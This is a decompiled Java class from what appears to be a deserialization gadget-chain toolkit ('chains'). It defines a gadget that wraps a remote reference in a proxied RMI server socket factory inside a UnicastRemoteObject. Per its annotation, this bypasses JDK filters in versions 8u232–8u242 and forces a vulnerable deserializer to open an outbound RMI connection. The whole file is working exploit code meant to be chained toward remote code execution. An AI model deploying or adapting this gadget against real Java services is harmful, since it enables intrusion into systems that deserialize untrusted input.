package com.ar3h.chains.gadget.impl.javanative.rmi;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.util.Reflections;
import java.lang.reflect.Constructor;
import java.lang.reflect.Proxy;
import java.rmi.Remote;
import java.rmi.server.RMIServerSocketFactory;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.rmi.server.RemoteRef;
import java.rmi.server.UnicastRemoteObject;

@GadgetAnnotation(name = "发起RMI请求bypass", description = "using to bypass jdk>=8u232 <=8u242\", \"return a UnicastRemoteObject object(An Trinh)", authors = {Authors.WH1T3P1G, Authors.LALA})
@GadgetTags(nextTags = {Tag.RMIConnect})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/javanative/rmi/RMIConnectWithUnicastRemoteObject.class */
public class RMIConnectWithUnicastRemoteObject implements Gadget {
    public UnicastRemoteObject getObject(Object obj) throws Exception {
        RMIServerSocketFactory rMIServerSocketFactory = (RMIServerSocketFactory) Proxy.newProxyInstance(RMIServerSocketFactory.class.getClassLoader(), new Class[]{RMIServerSocketFactory.class, Remote.class}, new RemoteObjectInvocationHandler((RemoteRef) obj));
        Constructor declaredConstructor = UnicastRemoteObject.class.getDeclaredConstructor(null);
        declaredConstructor.setAccessible(true);
        UnicastRemoteObject unicastRemoteObject = (UnicastRemoteObject) declaredConstructor.newInstance(null);
        Reflections.setFieldValue(unicastRemoteObject, "ssf", rMIServerSocketFactory);
        return unicastRemoteObject;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject(gadgetChain.doCreate(gadgetContext));
    }
}
